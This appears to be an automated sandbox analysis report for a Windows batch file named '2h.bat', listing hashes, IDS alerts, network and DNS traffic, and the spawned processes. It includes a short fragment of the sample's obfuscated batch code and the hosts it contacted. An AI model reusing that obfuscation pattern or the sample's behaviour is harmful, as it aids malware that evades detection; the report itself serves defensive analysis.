Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\cmd.exe |
File Type: | |
Category: | modified |
Size (bytes): | 383 |
Entropy (8bit): | 4.990570039466986 |
Encrypted: | false |
SSDEEP: | 6:9imM05yFt7gvVtNGWF0953NZIKCe97wyLVtytsRoJakSAsRoJSFzb7K6TwRt05py:9D+uN2953N4eRHTSbaR42v7K6TwQy |
MD5: | 720B2F339146F7AB20C96B03C18506AA |
SHA1: | 5D0BCCC86CBAC5709DAB593702F199A4DBDB69F3 |
SHA-256: | 176F08D758A2F2594561FFF547D119B2523E25944FCCFD007925F3B1CA0D807D |
SHA-512: | 89BF74D350ABD3D959BE7549EFA1337931DCF107297BDD4962FA55ACBB1FD9E9C30FBD5BED356EB8AFA55DFE71FE998132123851E3B7422C7BADEAA8F3F2C2A1 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.396185823482831 |
TrID: |
|
File name: | 2h.bat |
File size: | 41'819 bytes |
MD5: | 0110fbc81a42c9376f10dbe604491f77 |
SHA1: | daf5f87aea0e57749d2951014d3dfdee9b57fa30 |
SHA256: | ae8c6e7884ebe53f38a11df2b90c84bad4b4fa192dd361a58dc33db4fddb33d0 |
SHA512: | 354bc44e02daa21f2659bc6f4c996478663cf0ba2b8ef6d5cd2422fc84cf2e4475592f89bf8d6b73e9f06e4444a2307b81f72fab247363846e8a4eec44d6c940 |
SSDEEP: | 384:0TeaoxxRYVKwIjMkqPdP3FdAOWJZgLI1S2VZ282j8AHuKaAA7itGb0Ac4jDfp+IC:0TtOx5q41Brcary293oYwd7eRrOtoaL |
TLSH: | 8F13916C9BC30A8BB149904F93670C226DAFD43E7A6D308FAD97797E07D5208D12729D |
File Content Preview: | ..&@cls&@set "...=EVertGYjRF6hZgin@HfMXAuQ0ol5y1vkL7w94PNJ8IDOpWUsSTBKCazc3xdmbq 2".%...:~16,1%%...:~47,1%%...:~2,1%%...:~4,1%%....r.M%%...:~62,1%"..%...:~23,1%%...:~53,1%%...:~57,1%=%...:~55,1%%...:~0,1%%...:~20,1%%...:~8,1%%...:~14,1%%...:~32,1%%...:~46 |
Icon Hash: | 9686878b929a9886 |
Download Network PCAP: filtered – full
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-24T15:50:15.149265+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49722 | 104.16.231.132 | 443 | TCP |
2025-03-24T15:50:15.942803+0100 | 1810005 | Joe Security ANOMALY Microsoft Office WebDAV Discovery | 1 | 192.168.2.4 | 49722 | 104.16.231.132 | 443 | TCP |
2025-03-24T15:50:20.162097+0100 | 1810005 | Joe Security ANOMALY Microsoft Office WebDAV Discovery | 1 | 192.168.2.4 | 49733 | 104.16.231.132 | 443 | TCP |
- Total Packets: 78
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Mar 24, 2025 15:49:44.519855976 CET | 49671 | 443 | 192.168.2.4 | 204.79.197.203 |
Mar 24, 2025 15:49:48.755011082 CET | 49678 | 443 | 192.168.2.4 | 20.189.173.27 |
Mar 24, 2025 15:49:49.066737890 CET | 49678 | 443 | 192.168.2.4 | 20.189.173.27 |
Mar 24, 2025 15:49:49.332431078 CET | 49671 | 443 | 192.168.2.4 | 204.79.197.203 |
Mar 24, 2025 15:49:49.676116943 CET | 49678 | 443 | 192.168.2.4 | 20.189.173.27 |
Mar 24, 2025 15:49:50.879235029 CET | 49678 | 443 | 192.168.2.4 | 20.189.173.27 |
Mar 24, 2025 15:49:52.957401037 CET | 49680 | 443 | 192.168.2.4 | 204.79.197.222 |
Mar 24, 2025 15:49:53.285506010 CET | 49678 | 443 | 192.168.2.4 | 20.189.173.27 |
Mar 24, 2025 15:49:53.473007917 CET | 49681 | 80 | 192.168.2.4 | 2.17.190.73 |
Mar 24, 2025 15:49:58.098001003 CET | 49678 | 443 | 192.168.2.4 | 20.189.173.27 |
Mar 24, 2025 15:49:58.941770077 CET | 49671 | 443 | 192.168.2.4 | 204.79.197.203 |
Mar 24, 2025 15:50:02.080573082 CET | 49710 | 443 | 192.168.2.4 | 204.79.197.222 |
Mar 24, 2025 15:50:02.080921888 CET | 49710 | 443 | 192.168.2.4 | 204.79.197.222 |
Mar 24, 2025 15:50:02.081037045 CET | 49710 | 443 | 192.168.2.4 | 204.79.197.222 |
Mar 24, 2025 15:50:02.175426006 CET | 443 | 49710 | 204.79.197.222 | 192.168.2.4 |
Mar 24, 2025 15:50:02.175793886 CET | 443 | 49710 | 204.79.197.222 | 192.168.2.4 |
Mar 24, 2025 15:50:02.175810099 CET | 443 | 49710 | 204.79.197.222 | 192.168.2.4 |
Mar 24, 2025 15:50:02.176711082 CET | 443 | 49710 | 204.79.197.222 | 192.168.2.4 |
Mar 24, 2025 15:50:02.176750898 CET | 443 | 49710 | 204.79.197.222 | 192.168.2.4 |
Mar 24, 2025 15:50:02.176770926 CET | 49710 | 443 | 192.168.2.4 | 204.79.197.222 |
Mar 24, 2025 15:50:02.176809072 CET | 49710 | 443 | 192.168.2.4 | 204.79.197.222 |
Mar 24, 2025 15:50:02.177586079 CET | 49710 | 443 | 192.168.2.4 | 204.79.197.222 |
Mar 24, 2025 15:50:02.180687904 CET | 443 | 49710 | 204.79.197.222 | 192.168.2.4 |
Mar 24, 2025 15:50:02.180713892 CET | 443 | 49710 | 204.79.197.222 | 192.168.2.4 |
Mar 24, 2025 15:50:02.180747032 CET | 49710 | 443 | 192.168.2.4 | 204.79.197.222 |
Mar 24, 2025 15:50:02.180784941 CET | 49710 | 443 | 192.168.2.4 | 204.79.197.222 |
Mar 24, 2025 15:50:02.271159887 CET | 443 | 49710 | 204.79.197.222 | 192.168.2.4 |
Mar 24, 2025 15:50:02.510927916 CET | 49719 | 80 | 192.168.2.4 | 142.250.64.99 |
Mar 24, 2025 15:50:02.608783960 CET | 80 | 49719 | 142.250.64.99 | 192.168.2.4 |
Mar 24, 2025 15:50:02.609493971 CET | 49719 | 80 | 192.168.2.4 | 142.250.64.99 |
Mar 24, 2025 15:50:02.610291004 CET | 49719 | 80 | 192.168.2.4 | 142.250.64.99 |
Mar 24, 2025 15:50:02.706173897 CET | 80 | 49719 | 142.250.64.99 | 192.168.2.4 |
Mar 24, 2025 15:50:02.708606005 CET | 80 | 49719 | 142.250.64.99 | 192.168.2.4 |
Mar 24, 2025 15:50:02.754381895 CET | 49719 | 80 | 192.168.2.4 | 142.250.64.99 |
Mar 24, 2025 15:50:02.988513947 CET | 49719 | 80 | 192.168.2.4 | 142.250.64.99 |
Mar 24, 2025 15:50:03.087635040 CET | 80 | 49719 | 142.250.64.99 | 192.168.2.4 |
Mar 24, 2025 15:50:03.129302025 CET | 49719 | 80 | 192.168.2.4 | 142.250.64.99 |
Mar 24, 2025 15:50:07.707405090 CET | 49678 | 443 | 192.168.2.4 | 20.189.173.27 |
Mar 24, 2025 15:50:14.919277906 CET | 49722 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:14.919329882 CET | 443 | 49722 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:14.919397116 CET | 49722 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:14.921341896 CET | 49722 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:14.921365976 CET | 443 | 49722 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:15.148622036 CET | 443 | 49722 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:15.149265051 CET | 49722 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:15.380659103 CET | 49722 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:15.380685091 CET | 443 | 49722 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:15.382246017 CET | 443 | 49722 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:15.430111885 CET | 49722 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:15.639457941 CET | 49722 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:15.680332899 CET | 443 | 49722 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:15.886872053 CET | 49725 | 443 | 192.168.2.4 | 162.159.134.42 |
Mar 24, 2025 15:50:15.886908054 CET | 443 | 49725 | 162.159.134.42 | 192.168.2.4 |
Mar 24, 2025 15:50:15.886981964 CET | 49725 | 443 | 192.168.2.4 | 162.159.134.42 |
Mar 24, 2025 15:50:15.889715910 CET | 49725 | 443 | 192.168.2.4 | 162.159.134.42 |
Mar 24, 2025 15:50:15.889735937 CET | 443 | 49725 | 162.159.134.42 | 192.168.2.4 |
Mar 24, 2025 15:50:15.942809105 CET | 443 | 49722 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:15.942934036 CET | 443 | 49722 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:15.943092108 CET | 49722 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:16.003002882 CET | 49722 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:16.003036022 CET | 443 | 49722 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:16.003048897 CET | 49722 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:16.003067970 CET | 443 | 49722 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:16.111699104 CET | 443 | 49725 | 162.159.134.42 | 192.168.2.4 |
Mar 24, 2025 15:50:16.111771107 CET | 49725 | 443 | 192.168.2.4 | 162.159.134.42 |
Mar 24, 2025 15:50:16.118200064 CET | 49725 | 443 | 192.168.2.4 | 162.159.134.42 |
Mar 24, 2025 15:50:16.118222952 CET | 443 | 49725 | 162.159.134.42 | 192.168.2.4 |
Mar 24, 2025 15:50:16.118496895 CET | 443 | 49725 | 162.159.134.42 | 192.168.2.4 |
Mar 24, 2025 15:50:16.132512093 CET | 49725 | 443 | 192.168.2.4 | 162.159.134.42 |
Mar 24, 2025 15:50:16.132587910 CET | 443 | 49725 | 162.159.134.42 | 192.168.2.4 |
Mar 24, 2025 15:50:16.132644892 CET | 49725 | 443 | 192.168.2.4 | 162.159.134.42 |
Mar 24, 2025 15:50:19.632323980 CET | 49733 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:19.632370949 CET | 443 | 49733 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:19.632441998 CET | 49733 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:19.633516073 CET | 49733 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:19.633532047 CET | 443 | 49733 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:19.843959093 CET | 443 | 49733 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:19.844042063 CET | 49733 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:19.845455885 CET | 49733 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:19.845467091 CET | 443 | 49733 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:19.845721006 CET | 443 | 49733 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:19.878720999 CET | 49733 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:19.924325943 CET | 443 | 49733 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:20.003180027 CET | 49734 | 443 | 192.168.2.4 | 142.251.40.196 |
Mar 24, 2025 15:50:20.003216028 CET | 443 | 49734 | 142.251.40.196 | 192.168.2.4 |
Mar 24, 2025 15:50:20.003330946 CET | 49734 | 443 | 192.168.2.4 | 142.251.40.196 |
Mar 24, 2025 15:50:20.003472090 CET | 49734 | 443 | 192.168.2.4 | 142.251.40.196 |
Mar 24, 2025 15:50:20.003484011 CET | 443 | 49734 | 142.251.40.196 | 192.168.2.4 |
Mar 24, 2025 15:50:20.162094116 CET | 443 | 49733 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:20.162256956 CET | 443 | 49733 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:20.162365913 CET | 49733 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:20.162600994 CET | 49733 | 443 | 192.168.2.4 | 104.16.231.132 |
Mar 24, 2025 15:50:20.162619114 CET | 443 | 49733 | 104.16.231.132 | 192.168.2.4 |
Mar 24, 2025 15:50:20.215492010 CET | 443 | 49734 | 142.251.40.196 | 192.168.2.4 |
Mar 24, 2025 15:50:20.215562105 CET | 49734 | 443 | 192.168.2.4 | 142.251.40.196 |
Mar 24, 2025 15:50:20.216908932 CET | 49734 | 443 | 192.168.2.4 | 142.251.40.196 |
Mar 24, 2025 15:50:20.216922045 CET | 443 | 49734 | 142.251.40.196 | 192.168.2.4 |
Mar 24, 2025 15:50:20.217174053 CET | 443 | 49734 | 142.251.40.196 | 192.168.2.4 |
Mar 24, 2025 15:50:20.269697905 CET | 49734 | 443 | 192.168.2.4 | 142.251.40.196 |
Mar 24, 2025 15:50:30.219425917 CET | 443 | 49734 | 142.251.40.196 | 192.168.2.4 |
Mar 24, 2025 15:50:30.219480038 CET | 443 | 49734 | 142.251.40.196 | 192.168.2.4 |
Mar 24, 2025 15:50:30.219575882 CET | 49734 | 443 | 192.168.2.4 | 142.251.40.196 |
Mar 24, 2025 15:50:31.802458048 CET | 49734 | 443 | 192.168.2.4 | 142.251.40.196 |
Mar 24, 2025 15:50:31.802505016 CET | 443 | 49734 | 142.251.40.196 | 192.168.2.4 |
Mar 24, 2025 15:51:03.426799059 CET | 49719 | 80 | 192.168.2.4 | 142.250.64.99 |
Mar 24, 2025 15:51:03.520003080 CET | 80 | 49719 | 142.250.64.99 | 192.168.2.4 |
Mar 24, 2025 15:51:03.520157099 CET | 49719 | 80 | 192.168.2.4 | 142.250.64.99 |
Mar 24, 2025 15:51:19.954225063 CET | 49740 | 443 | 192.168.2.4 | 142.251.40.196 |
Mar 24, 2025 15:51:19.954268932 CET | 443 | 49740 | 142.251.40.196 | 192.168.2.4 |
Mar 24, 2025 15:51:19.956749916 CET | 49740 | 443 | 192.168.2.4 | 142.251.40.196 |
Mar 24, 2025 15:51:19.956868887 CET | 49740 | 443 | 192.168.2.4 | 142.251.40.196 |
Mar 24, 2025 15:51:19.956876993 CET | 443 | 49740 | 142.251.40.196 | 192.168.2.4 |
Mar 24, 2025 15:51:20.171539068 CET | 443 | 49740 | 142.251.40.196 | 192.168.2.4 |
Mar 24, 2025 15:51:20.172137976 CET | 49740 | 443 | 192.168.2.4 | 142.251.40.196 |
Mar 24, 2025 15:51:20.172164917 CET | 443 | 49740 | 142.251.40.196 | 192.168.2.4 |
Mar 24, 2025 15:51:30.177586079 CET | 443 | 49740 | 142.251.40.196 | 192.168.2.4 |
Mar 24, 2025 15:51:30.177737951 CET | 443 | 49740 | 142.251.40.196 | 192.168.2.4 |
Mar 24, 2025 15:51:30.177969933 CET | 49740 | 443 | 192.168.2.4 | 142.251.40.196 |
Mar 24, 2025 15:51:31.804641962 CET | 49740 | 443 | 192.168.2.4 | 142.251.40.196 |
Mar 24, 2025 15:51:31.804682970 CET | 443 | 49740 | 142.251.40.196 | 192.168.2.4 |
Mar 24, 2025 15:51:33.787131071 CET | 49708 | 443 | 192.168.2.4 | 52.113.196.254 |
Mar 24, 2025 15:51:34.116301060 CET | 49709 | 443 | 192.168.2.4 | 131.253.33.254 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Mar 24, 2025 15:50:14.769285917 CET | 57653 | 53 | 192.168.2.4 | 1.1.1.1 |
Mar 24, 2025 15:50:14.879667997 CET | 53 | 57653 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:50:15.758053064 CET | 53350 | 53 | 192.168.2.4 | 1.1.1.1 |
Mar 24, 2025 15:50:15.762254953 CET | 54658 | 53 | 192.168.2.4 | 1.1.1.1 |
Mar 24, 2025 15:50:15.860186100 CET | 53 | 59381 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:50:15.873464108 CET | 53 | 53350 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:50:15.874695063 CET | 53 | 54658 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:50:15.972352028 CET | 53 | 58815 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:50:16.833005905 CET | 53 | 64927 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:50:19.895682096 CET | 59971 | 53 | 192.168.2.4 | 1.1.1.1 |
Mar 24, 2025 15:50:19.896028996 CET | 62763 | 53 | 192.168.2.4 | 1.1.1.1 |
Mar 24, 2025 15:50:20.000814915 CET | 53 | 59971 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:50:20.002268076 CET | 53 | 62763 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:50:31.817250013 CET | 50149 | 53 | 192.168.2.4 | 1.1.1.1 |
Mar 24, 2025 15:50:31.921622992 CET | 53 | 50149 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:50:33.751878977 CET | 53 | 57509 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:50:48.724684000 CET | 49455 | 53 | 192.168.2.4 | 1.1.1.1 |
Mar 24, 2025 15:50:48.883153915 CET | 53 | 49455 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:50:48.979231119 CET | 138 | 138 | 192.168.2.4 | 192.168.2.255 |
Mar 24, 2025 15:50:52.688574076 CET | 53 | 54111 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:51:07.693167925 CET | 63264 | 53 | 192.168.2.4 | 1.1.1.1 |
Mar 24, 2025 15:51:07.806545019 CET | 53 | 63264 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:51:15.050442934 CET | 53 | 52140 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:51:15.196801901 CET | 53 | 64178 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:51:17.910377979 CET | 53 | 55126 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:51:18.674397945 CET | 53 | 58205 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:51:27.802215099 CET | 49182 | 53 | 192.168.2.4 | 1.1.1.1 |
Mar 24, 2025 15:51:27.911925077 CET | 53 | 49182 | 1.1.1.1 | 192.168.2.4 |
Mar 24, 2025 15:51:47.027631044 CET | 53 | 53354 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
Mar 24, 2025 15:51:45.045152903 CET | 192.168.2.4 | 1.1.1.1 | c233 | (Port unreachable) | Destination Unreachable |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Mar 24, 2025 15:50:14.769285917 CET | 192.168.2.4 | 1.1.1.1 | 0x2ccd | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 24, 2025 15:50:15.758053064 CET | 192.168.2.4 | 1.1.1.1 | 0x6685 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 24, 2025 15:50:15.762254953 CET | 192.168.2.4 | 1.1.1.1 | 0x9ce1 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 24, 2025 15:50:19.895682096 CET | 192.168.2.4 | 1.1.1.1 | 0xae50 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 24, 2025 15:50:19.896028996 CET | 192.168.2.4 | 1.1.1.1 | 0xcf18 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 24, 2025 15:50:31.817250013 CET | 192.168.2.4 | 1.1.1.1 | 0x663e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 24, 2025 15:50:48.724684000 CET | 192.168.2.4 | 1.1.1.1 | 0x2b85 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 24, 2025 15:51:07.693167925 CET | 192.168.2.4 | 1.1.1.1 | 0x3cea | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 24, 2025 15:51:27.802215099 CET | 192.168.2.4 | 1.1.1.1 | 0x3ccd | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Mar 24, 2025 15:50:14.879667997 CET | 1.1.1.1 | 192.168.2.4 | 0x2ccd | No error (0) | 104.16.231.132 | A (IP address) | IN (0x0001) | false | ||
Mar 24, 2025 15:50:14.879667997 CET | 1.1.1.1 | 192.168.2.4 | 0x2ccd | No error (0) | 104.16.230.132 | A (IP address) | IN (0x0001) | false | ||
Mar 24, 2025 15:50:15.873464108 CET | 1.1.1.1 | 192.168.2.4 | 0x6685 | No error (0) | healyconsultants.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 24, 2025 15:50:15.873464108 CET | 1.1.1.1 | 192.168.2.4 | 0x6685 | No error (0) | 162.159.134.42 | A (IP address) | IN (0x0001) | false | ||
Mar 24, 2025 15:50:15.874695063 CET | 1.1.1.1 | 192.168.2.4 | 0x9ce1 | No error (0) | healyconsultants.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 24, 2025 15:50:20.000814915 CET | 1.1.1.1 | 192.168.2.4 | 0xae50 | No error (0) | 142.251.40.196 | A (IP address) | IN (0x0001) | false | ||
Mar 24, 2025 15:50:20.002268076 CET | 1.1.1.1 | 192.168.2.4 | 0xcf18 | No error (0) | 65 | IN (0x0001) | false | |||
Mar 24, 2025 15:50:31.921622992 CET | 1.1.1.1 | 192.168.2.4 | 0x663e | No error (0) | 104.16.230.132 | A (IP address) | IN (0x0001) | false | ||
Mar 24, 2025 15:50:31.921622992 CET | 1.1.1.1 | 192.168.2.4 | 0x663e | No error (0) | 104.16.231.132 | A (IP address) | IN (0x0001) | false | ||
Mar 24, 2025 15:50:48.883153915 CET | 1.1.1.1 | 192.168.2.4 | 0x2b85 | No error (0) | 104.16.231.132 | A (IP address) | IN (0x0001) | false | ||
Mar 24, 2025 15:50:48.883153915 CET | 1.1.1.1 | 192.168.2.4 | 0x2b85 | No error (0) | 104.16.230.132 | A (IP address) | IN (0x0001) | false | ||
Mar 24, 2025 15:51:07.806545019 CET | 1.1.1.1 | 192.168.2.4 | 0x3cea | No error (0) | 104.16.231.132 | A (IP address) | IN (0x0001) | false | ||
Mar 24, 2025 15:51:07.806545019 CET | 1.1.1.1 | 192.168.2.4 | 0x3cea | No error (0) | 104.16.230.132 | A (IP address) | IN (0x0001) | false | ||
Mar 24, 2025 15:51:27.911925077 CET | 1.1.1.1 | 192.168.2.4 | 0x3ccd | No error (0) | 104.16.230.132 | A (IP address) | IN (0x0001) | false | ||
Mar 24, 2025 15:51:27.911925077 CET | 1.1.1.1 | 192.168.2.4 | 0x3ccd | No error (0) | 104.16.231.132 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port |
---|---|---|---|---|
0 | 192.168.2.4 | 49719 | 142.250.64.99 | 80 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Mar 24, 2025 15:50:02.610291004 CET | 202 | OUT | |
Mar 24, 2025 15:50:02.708606005 CET | 223 | IN | |
Mar 24, 2025 15:50:02.988513947 CET | 200 | OUT | |
Mar 24, 2025 15:50:03.087635040 CET | 223 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49722 | 104.16.231.132 | 443 | 1424 | C:\Windows\System32\net.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-24 14:50:15 UTC | 140 | OUT | |
2025-03-24 14:50:15 UTC | 331 | IN | |
2025-03-24 14:50:15 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49733 | 104.16.231.132 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-24 14:50:19 UTC | 200 | OUT | |
2025-03-24 14:50:20 UTC | 226 | IN | |
2025-03-24 14:50:20 UTC | 418 | IN | |
2025-03-24 14:50:20 UTC | 5 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 4 |
Start time: | 10:49:48 |
Start date: | 24/03/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6cb660000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 10:49:48 |
Start date: | 24/03/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 10:49:49 |
Start date: | 24/03/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7016f0000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 9 |
Start time: | 10:50:12 |
Start date: | 24/03/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6cb660000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 10 |
Start time: | 10:50:12 |
Start date: | 24/03/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 11 |
Start time: | 10:50:13 |
Start date: | 24/03/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff786830000 |
File size: | 3'388'000 bytes |
MD5 hash: | E81F54E6C1129887AEA47E7D092680BF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 12 |
Start time: | 10:50:13 |
Start date: | 24/03/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff65abe0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 13 |
Start time: | 10:50:13 |
Start date: | 24/03/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff786830000 |
File size: | 3'388'000 bytes |
MD5 hash: | E81F54E6C1129887AEA47E7D092680BF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 17 |
Start time: | 10:50:19 |
Start date: | 24/03/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff65abe0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |